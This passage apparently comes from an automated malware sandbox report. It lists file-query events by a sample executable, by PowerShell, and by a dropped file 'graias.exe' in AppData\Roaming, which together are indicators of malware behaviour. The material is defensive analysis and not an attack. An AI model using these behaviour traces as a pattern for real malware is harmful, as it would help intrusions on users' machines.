                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Users\user\AppData\Roaming\Graias\graias.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
